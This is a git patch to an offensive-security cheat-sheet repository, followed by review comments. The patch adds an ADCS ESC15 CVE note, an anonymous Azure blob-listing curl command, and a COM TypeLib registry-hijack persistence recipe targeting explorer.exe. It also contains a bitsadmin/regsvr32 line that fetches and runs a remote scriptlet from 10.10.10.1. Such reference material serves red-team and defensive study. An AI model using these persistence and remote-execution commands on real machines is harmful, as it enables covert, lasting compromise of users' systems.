From ea7e265dac4a3cf01fbaba8981386a2386a26598 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Nov 2024 13:15:04 +0100 Subject: [PATCH] COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage --- .../ad-adcs-certificate-services.md | 5 ++- .../azure/azure-services-storage-blob.md | 34 +++++++++++++++ .../persistence/windows-persistence.md | 41 ++++++++++++++++++- 3 files changed, 78 insertions(+), 2 deletions(-) diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index 00cd3d0..5e5f626 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -423,7 +423,10 @@ Members : {} ``` -## ESC15 - EKUwu Application Policies +## ESC15 - EKUwu Application Policies - CVE-2024-49019 + +This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information. + **Requirements** diff --git a/docs/cloud/azure/azure-services-storage-blob.md b/docs/cloud/azure/azure-services-storage-blob.md index 31c5647..2e1a77b 100644 --- a/docs/cloud/azure/azure-services-storage-blob.md +++ b/docs/cloud/azure/azure-services-storage-blob.md 
@@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net ## List and download blobs +Visiting `https://.blob.core.windows.net/?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs. + +```xml + + + + index.html + https://.blob.core.windows.net//index.html + + Fri, 20 Oct 2023 20:08:20 GMT + 0x8DBD1A84E6455C0 + 782359 + text/html + + + JSe+sM+pXGAEFInxDgv4CA== + + BlockBlob + unlocked + + +``` + +Browse deleted files. + +```ps1 +$ curl -s -H "x-ms-version: 2019-12-12" 'https://.blob.core.windows.net/?restype=container&comp=list&include=versions' | xmllint --format - | grep Name + + + index.html + scripts-transfer.zip +``` + + ```powershell PS Az> Get-AzResource PS Az> Get-AzStorageAccount -name -ResourceGroupName diff --git a/docs/redteam/persistence/windows-persistence.md b/docs/redteam/persistence/windows-persistence.md index 0a31a9b..0be010a 100644 --- a/docs/redteam/persistence/windows-persistence.md +++ b/docs/redteam/persistence/windows-persistence.md @@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1 bitsadmin /resume backdoor ``` + +### COM TypeLib + +* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique + +Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run. + + +```ps1 +Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32 +Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64 +Name: anything +Type: REG_SZ +Value: script:C:\1.sct +``` + +Example of content for `1.sct`. + +```xml + + + + + + +``` + + ## Serviceland ### IIS 
@@ -622,4 +660,5 @@ Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime" * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) * [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/) -* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) \ No newline at end of file +* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) +* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) \ No newline at end of file
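Review bot: the new sentence under the ESC15 heading in docs/active-directory/ad-adcs-certificate-services.md reads `patched on November 12, See [...]`, which is a comma splice that also leaves the year implicit; suggest `... was patched on November 12, 2024. See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](...) for more information.` (the year matches the commit date). Since the heading now carries CVE-2024-49019, the **Requirements** list that follows should also state that the issuing CA must be unpatched for this ESC to apply, so a reader assessing exposure sees that the November patch closes it.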
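Review bot: in docs/cloud/azure/azure-services-storage-blob.md the added paragraph says the listing URL "provides a JSON file", but the response that follows is fenced as `xml` and the next command pipes it through `xmllint`, so "JSON" should read "XML". Both URLs are written as `https://.blob.core.windows.net/?restype=container&comp=list` with the storage account and container missing; suggest visible placeholders such as `https://<account>.blob.core.windows.net/<container>?restype=container&comp=list` inside the backticks. The block introduced as "Browse deleted files." uses `include=versions`, which asks the List Blobs API for blob versions; soft-deleted blobs are requested with `include=deleted`, and the two can be combined as `include=versions,deleted`, so either the sentence or the parameter should be changed to match. That `$ curl ... | xmllint --format - | grep Name` block is a shell pipeline, not PowerShell, so fence it as `bash` rather than `ps1`. It would also help the defensive reader to state the precondition: anonymous listing only succeeds when the container's public access level allows listing, which is the setting to audit and tighten.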
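Review bot: in the `### COM TypeLib` hunk of docs/redteam/persistence/windows-persistence.md the registry block is fenced as `ps1` but contains `Path:`/`Name:`/`Type:`/`Value:` lines, not PowerShell; fence it as `text` or replace it with real `reg add` or `New-ItemProperty` commands. The path `HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32` uses a `{CLSID}` placeholder, but keys under `TypeLib` are indexed by the type library's own GUID (the LIBID that appears in the `RegOpenKey` / `NAME NOT FOUND` Procmon event the paragraph tells the reader to look for), so rename it to `{LIBID}` and say that the `1.1` and `0` components are the version and LCID taken from that same event. `Name: anything` is ambiguous: the type library path is normally read from the key's default value, so this should probably say `(Default)`; please confirm against the referenced CICADA8 write-up. The block introduced as "Example of content for `1.sct`" is empty as rendered here, so check that the scriptlet markup survived the commit. The Procmon link points at the `fr-fr` locale; use `en-us` to match the rest of the docs. For the detection side it is worth adding one line noting the artifact this leaves: a user-writable `HKCU\Software\Classes\TypeLib\...\win32` or `win64` key whose value starts with `script:`, which is what to hunt for and remove.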
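Review bot: the reference hunk at the end of docs/redteam/persistence/windows-persistence.md still ends with `\ No newline at end of file` after the new CICADA8 entry; add the trailing newline so the next appended reference does not produce another spurious diff against the last line. The entry itself follows the existing `[Title - Author - Date](url)` pattern of the list, which is fine.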